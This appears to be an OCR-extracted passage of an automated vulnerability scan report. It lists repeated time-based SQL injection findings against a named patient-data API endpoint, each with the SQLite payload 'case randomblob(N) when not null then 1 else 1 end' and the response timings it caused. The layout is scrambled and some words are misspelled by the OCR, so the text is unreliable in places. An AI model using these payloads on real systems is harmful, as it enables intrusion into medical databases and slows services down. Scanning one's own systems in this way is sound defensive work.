The query time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [2,600] milliseconds, parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [4,624] milliseconds, when the original unmodified query with value [Fixed Prosthesis] took [769] milliseconds.

URL

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method **POST**

Attack case randomblob(100000) when not null then 1 else 1 end

> The guery time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [2,023] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [4,368] milliseconds, when the original unmodified query with value [248]

took [1,544] milliseconds.

The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [2,023] milliseconds, parameter

Other

Info value [case randomblob(1000000) when not null then 1 else 1 end], which caused the

request to take [4,368] milliseconds, when the original unmodified query with value [248]

took [1,544] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save doctor-feedback

Method POST

Evidence

Other

Evidence

Other

Evidence

Other

Evidence

Other

Info

Info

Info

Info

URL

Attack case randomblob(1000000) when not null then 1 else 1 end

The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,311] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [2,964] milliseconds, when the original unmodified query with value [1094]

took [1,730] milliseconds.

The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,311] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [2,964] milliseconds, when the original unmodified query with value [1094] took [1,730] milliseconds.

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method POST

Attack case randomblob(1000000) when not null then 1 else 1 end

The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,855] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [2,962] milliseconds, when the original unmodified query with value [103] took

[262] milliseconds.

The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,855] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [2,962] milliseconds, when the original unmodified query with value [103] took

[262] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method POST

Attack case randomblob(100000000) when not null then 1 else 1 end

The query time is controllable using parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [1,906] milliseconds, parameter value [case randomblob(1000000000) when not null then 1 else 1 end], which caused the request to take [2,541] milliseconds, when the original unmodified query with

value [794] took [4,978] milliseconds.

The query time is controllable using parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [1,906] milliseconds, parameter value [case randomblob(1000000000) when not null then 1 else 1 end], which caused the request to take [2,541] milliseconds, when the original unmodified guery with

value [794] took [4,978] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save doctor-feedback

Method POST

Attack case randomblob(100000000) when not null then 1 else 1 end

The query time is controllable using parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [2,902] milliseconds,

parameter value [case randomblob(1000000000) when not null then 1 else 1 end], which caused the request to take [3,658] milliseconds, when the original unmodified query with

value [244] took [1,904] milliseconds.

The query time is controllable using parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [2,902] milliseconds, parameter value [case randomblob(1000000000) when not null then 1 else 1 end], which caused the request to take [3,658] milliseconds, when the original unmodified query with

value [244] took [1,904] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method POST

Attack case randomblob(1000000) when not null then 1 else 1 end

> The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [3,078] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [3,359] milliseconds, when the original unmodified query with value [False]

took [796] milliseconds.

The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [3,078] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [3,359] milliseconds, when the original unmodified query with value [False]

took [796] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

POST

case randomblob(100000000) when not null then 1 else 1 end Attack

> The query time is controllable using parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [2,007] milliseconds, parameter value [case randomblob(1000000000) when not null then 1 else 1 end], which caused the request to take [2,301] milliseconds, when the original unmodified query with

value [False] took [1,244] milliseconds.

The guery time is controllable using parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [2,007] milliseconds, parameter value [case randomblob(1000000000) when not null then 1 else 1 end], which caused the request to take [2,301] milliseconds, when the original unmodified query with

value [False] took [1,244] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

POST

case randomblob(100000) when not null then 1 else 1 end Attack

> The guery time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [1,159] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,343] milliseconds, when the original unmodified query with value

[UNIVERSAL] took [891] milliseconds.

The guery time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [1,159] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,343] milliseconds, when the original unmodified query with value

[UNIVERSAL] took [891] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

POST Method

Attack case randomblob(1000000) when not null then 1 else 1 end

> The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,528] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [1,816] milliseconds, when the original unmodified query with value [Finding

(s)] took [930] milliseconds.

The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,528] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [1,816] milliseconds, when the original unmodified query with value [Finding

(s)] took [930] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save doctor feedback

POST Method

Attack

case randomblob(100000) when not null then 1 else 1 end

Other

Info

Evidence

Method

Evidence

Other Info

Method

Evidence

Other Info

Evidence

Other Info

Evidence

The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [1,097] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,546] milliseconds, when the original unmodified query with value [20] took [774] milliseconds.

Other Info The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [1,097] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,546] milliseconds, when the original unmodified query with value [20] took [774] milliseconds.

URL

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method

POST

Attack

case randomblob(10000000) when not null then 1 else 1 end

Evidence

not null then 1 else 1 end], which caused the request to take [1,360] milliseconds, parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [1,696] milliseconds, when the original unmodified query with value [35] took [3,611] milliseconds.

The guery time is controllable using parameter value [case randomblob(100000000) when

Other Info The query time is controllable using parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [1,360] milliseconds, parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [1,696] milliseconds, when the original unmodified query with value [35] took [3,611] milliseconds.

URL

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method

POST

Attack

case randomblob(10000000) when not null then 1 else 1 end

Evidence

The query time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [1,021] milliseconds, parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [1,510] milliseconds, when the original unmodified query with value [319] took [4,865] milliseconds.

Other Info The query time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [1,021] milliseconds, parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [1,510] milliseconds, when the original unmodified query with value [319] took [4,865] milliseconds.

URL

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method

POST

Attack

Evidence

case randomblob(10000000) when not null then 1 else 1 end

The query time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [1,124] milliseconds, parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [1,132] milliseconds, when the original unmodified query with

value [594] took [918] milliseconds.

Other Info The query time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [1,124] milliseconds, parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [1,132] milliseconds, when the original unmodified query with value [594] took [918] milliseconds.

URL

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method

POST

Attack

case randomblob(100000000) when not null then 1 else 1 end

The query time is controllable using parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [1,288] milliseconds,

Evidence

parameter value [case randomblob(1000000000) when not null then 1 else 1 end], which caused the request to take [2,912] milliseconds, when the original unmodified query with value [65] took [267] milliseconds.

Other Info The query time is controllable using parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [1,288] milliseconds, parameter value [case randomblob(1000000000) when not null then 1 else 1 end], which caused the request to take [2,912] milliseconds, when the original unmodified query with value [65] took [267] milliseconds.

URL

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method

POST

Attack

case randomblob(100000) when not null then 1 else 1 end

Evidence

The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [1,005] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,360] milliseconds, when the original unmodified query with value [0] took [772] milliseconds.

Other

The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [1,005] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,360] milliseconds, when the original unmodified query with value [0] took [772] milliseconds.

Info

URL

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method

POST

Attack

case randomblob(100000) when not null then 1 else 1 end

Evidence

The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [1,041] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [3,691] milliseconds, when the original unmodified query with value [312] took [310] milliseconds.

Other Info The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [1,041] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [3,691] milliseconds, when the original unmodified query with value [312] took [310] milliseconds.

URL

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method

POST

Attack

case randomblob(100000) when not null then 1 else 1 end

Evidence

The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [1,101] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [8,013] milliseconds, when the original unmodified query with value [1018] took [257] milliseconds.

Other Info The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [1,101] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [8,013] milliseconds, when the original unmodified query with value [1018] took [257] milliseconds.

URL

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method

POST

Attack

case randomblob(100000) when not null then 1 else 1 end

Evidence

The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [1,104] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,368] milliseconds, when the original unmodified query with value [517] took [773] milliseconds.

Other Info The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [1,104] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,368] milliseconds, when the original unmodified query with value [517] took [773] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

POST Method

case randomblob(100000) when not null then 1 else 1 end Attack

> The guery time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [1,109] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,517] milliseconds, when the original unmodified guery with value [551]

took [1,080] milliseconds.

The guery time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [1,109] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,517] milliseconds, when the original unmodified query with value [551]

took [1,080] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

POST

case randomblob(100000) when not null then 1 else 1 end Attack

> The guery time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [1,115] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,388] milliseconds, when the original unmodified guery with value [741]

took [788] milliseconds.

The guery time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [1,115] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,388] milliseconds, when the original unmodified query with value [741]

took [788] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

POST

case randomblob(100000) when not null then 1 else 1 end Attack

> The guery time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [1,125] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,262] milliseconds, when the original unmodified query with value [866]

took [825] milliseconds.

The guery time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [1,125] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,262] milliseconds, when the original unmodified query with value [866]

took [825] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

POST Method

Attack case randomblob(100000) when not null then 1 else 1 end

> The guery time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [1,161] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [2,594] milliseconds, when the original unmodified query with value [329]

took [770] milliseconds.

The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [1,161] milliseconds, parameter

value [case randomblob(1000000) when not null then 1 else 1 end], which caused the

Info request to take [2,594] milliseconds, when the original unmodified query with value [329]

took [770] milliseconds.

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback URL

Method **POST**

Other Info

Evidence

Method

Evidence

Other Info

Method

Evidence

Other Info

Evidence

Other

Attack case randomblob(100000) when not null then 1 else 1 end

> The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [1,164] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,320] milliseconds, when the original unmodified query with value [453]

took [1,062] milliseconds.

The guery time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [1,164] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,320] milliseconds, when the original unmodified query with value [453] took [1,062] milliseconds.

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method **POST**

case randomblob(100000) when not null then 1 else 1 end Attack

> The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [1,251] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,941] milliseconds, when the original unmodified query with value [334]

took [615] milliseconds.

The guery time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [1,251] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,941] milliseconds, when the original unmodified query with value [334] took [615] milliseconds.

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

POST Method

case randomblob(100000) when not null then 1 else 1 end

The guery time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [1,259] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [3,578] milliseconds, when the original unmodified query with value [329]

took [979] milliseconds.

The guery time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [1,259] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [3,578] milliseconds, when the original unmodified query with value [329]

took [979] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

POST Method

case randomblob(100000) when not null then 1 else 1 end

The guery time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [1,277] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,564] milliseconds, when the original unmodified query with value [349]

took [898] milliseconds.

The guery time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [1,277] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,564] milliseconds, when the original unmodified query with value [349]

took [898] milliseconds.

https://api.velmeni.ai/api/patient/scan/save doctor feedback

Other Info

URL

Evidence

Evidence

Other Info

URL

Attack

Evidence

Other Info

Attack

Evidence

Other Info

URL

Method **POST**

Evidence

Other

Info

Attack case randomblob(100000) when not null then 1 else 1 end

> The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [1,291] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,425] milliseconds, when the original unmodified query with value [0] took

[774] milliseconds.

The guery time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [1,291] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,425] milliseconds, when the original unmodified query with value [0] took

[774] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method POST

Attack case randomblob(100000) when not null then 1 else 1 end

> The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [1,336] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [2,157] milliseconds, when the original unmodified query with value [1389]

took [641] milliseconds.

The guery time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [1,336] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [2,157] milliseconds, when the original unmodified guery with value [1389]

took [641] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method **POST**

Attack case randomblob(100000) when not null then 1 else 1 end

> The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [1,359] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,812] milliseconds, when the original unmodified query with value [327]

took [1,233] milliseconds.

The guery time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [1,359] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,812] milliseconds, when the original unmodified query with value [327] took [1,233] milliseconds.

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method **POST**

Attack case randomblob(100000) when not null then 1 else 1 end

> The guery time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [1,412] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,544] milliseconds, when the original unmodified query with value [344]

took [899] milliseconds.

The guery time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [1,412] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,544] milliseconds, when the original unmodified query with value [344]

took [899] milliseconds.

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method **POST**

case randomblob(100000) when not null then 1 else 1 end

Other

Evidence

Info

Evidence

Other Info

URL

Evidence

Other

Info

URL

Attack

Evidence

The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [1,438] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,763] milliseconds, when the original unmodified query with value [400] took [791] milliseconds.

Other Info The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [1,438] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,763] milliseconds, when the original unmodified query with value [400] took [791] milliseconds.

URL

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method

POST

Attack

case randomblob(100000) when not null then 1 else 1 end

Evidence

The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [1,438] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,845] milliseconds, when the original unmodified query with value [473] took [1,128] milliseconds.

Other Info The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [1,438] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,845] milliseconds, when the original unmodified query with value [473] took [1,128] milliseconds.

URL

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method

POST

Attack

case randomblob(100000) when not null then 1 else 1 end

Evidence

The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [1,461] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,623] milliseconds, when the original unmodified query with value [507] took [1,105] milliseconds.

Other Info The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [1,461] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,623] milliseconds, when the original unmodified query with value [507] took [1,105] milliseconds.

URL

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method

POST

Attack

case randomblob(100000) when not null then 1 else 1 end

Evidence

The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [1,506] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,658] milliseconds, when the original unmodified query with value [488] took [1,418] milliseconds.

Other

The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [1,506] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,658] milliseconds, when the original unmodified query with value [488] took [1,418] milliseconds.

Info

URL

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method

POST

Attack

case randomblob(100000) when not null then 1 else 1 end

The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [1,579] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the

request to take [2,300] milliseconds, when the original unmodified guery with value [602]

took [767] milliseconds.

Other Info

The guery time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [1,579] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [2,300] milliseconds, when the original unmodified query with value [602] took [767] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method **POST**

Attack case randomblob(100000) when not null then 1 else 1 end

> The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [1,687] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [6,027] milliseconds, when the original unmodified guery with value [885]

took [1,554] milliseconds.

Other Info

Evidence

The guery time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [1,687] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [6,027] milliseconds, when the original unmodified query with value [885] took [1,554] milliseconds.

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback URL

POST Method

case randomblob(100000) when not null then 1 else 1 end Attack

> The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [1,743] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [2,904] milliseconds, when the original unmodified query with value

[716.8313725490195] took [1,465] milliseconds.

Other Info

URL

Evidence

The guery time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [1,743] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [2,904] milliseconds, when the original unmodified query with value [716.8313725490195] took [1,465] milliseconds.

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method **POST**

case randomblob(100000) when not null then 1 else 1 end Attack

> The guery time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [1,751] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [3,920] milliseconds, when the original unmodified query with value [466]

took [1,049] milliseconds.

Other Info

The guery time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [1,751] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [3,920] milliseconds, when the original unmodified query with value [466] took [1,049] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method **POST**

Attack case randomblob(100000) when not null then 1 else 1 end

> The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [1,773] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [2,667] milliseconds, when the original unmodified query with value [0] took

[777] milliseconds.

The query time is controllable using parameter value [case randomblob(100000) when not

Evidence

Other Info

null then 1 else 1 end], which caused the request to take [1,773] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [2,667] milliseconds, when the original unmodified query with value [0] took [777] milliseconds.

URL

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method

POST

Attack

case randomblob(100000) when not null then 1 else 1 end

Evidence

The guery time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [1,787] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,909] milliseconds, when the original unmodified query with value [351] took [795] milliseconds.

Other Info

The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [1,787] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,909] milliseconds, when the original unmodified query with value [351] took [795] milliseconds.

URL

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method

POST

Attack

case randomblob(100000) when not null then 1 else 1 end

Evidence

The guery time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [1,876] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [2,888] milliseconds, when the original unmodified query with value [397]

took [1,356] milliseconds.

Other Info

The guery time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [1,876] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [2,888] milliseconds, when the original unmodified query with value [397] took [1,356] milliseconds.

URL

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method

POST

Attack

case randomblob(100000) when not null then 1 else 1 end

Evidence

The guery time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [1,903] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [4,386] milliseconds, when the original unmodified query with value [305] took [809] milliseconds.

Other Info

The guery time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [1,903] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [4,386] milliseconds, when the original unmodified query with value [305] took [809] milliseconds.

URL

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method

POST

Attack

case randomblob(100000) when not null then 1 else 1 end

Evidence

The guery time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [1,910] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [3,391] milliseconds, when the original unmodified query with value [247] took [797] milliseconds.

The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [1,910] milliseconds, parameter

Other

value [case randomblob(1000000) when not null then 1 else 1 end], which caused the Info

request to take [3,391] milliseconds, when the original unmodified query with value [247]

took [797] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

POST Method

Attack case randomblob(100000) when not null then 1 else 1 end

> The guery time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [1,989] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [2,120] milliseconds, when the original unmodified query with value [851]

took [1,576] milliseconds.

The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [1,989] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [2,120] milliseconds, when the original unmodified query with value [851] took [1,576] milliseconds.

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method **POST**

case randomblob(100000) when not null then 1 else 1 end Attack

> The guery time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [2,011] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [3,255] milliseconds, when the original unmodified query with value [876]

took [1,289] milliseconds.

The guery time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [2,011] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [3,255] milliseconds, when the original unmodified query with value [876] took [1,289] milliseconds.

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method **POST**

case randomblob(100000) when not null then 1 else 1 end Attack

> The guery time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [2,033] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [2,158] milliseconds, when the original unmodified query with value [456]

took [260] milliseconds.

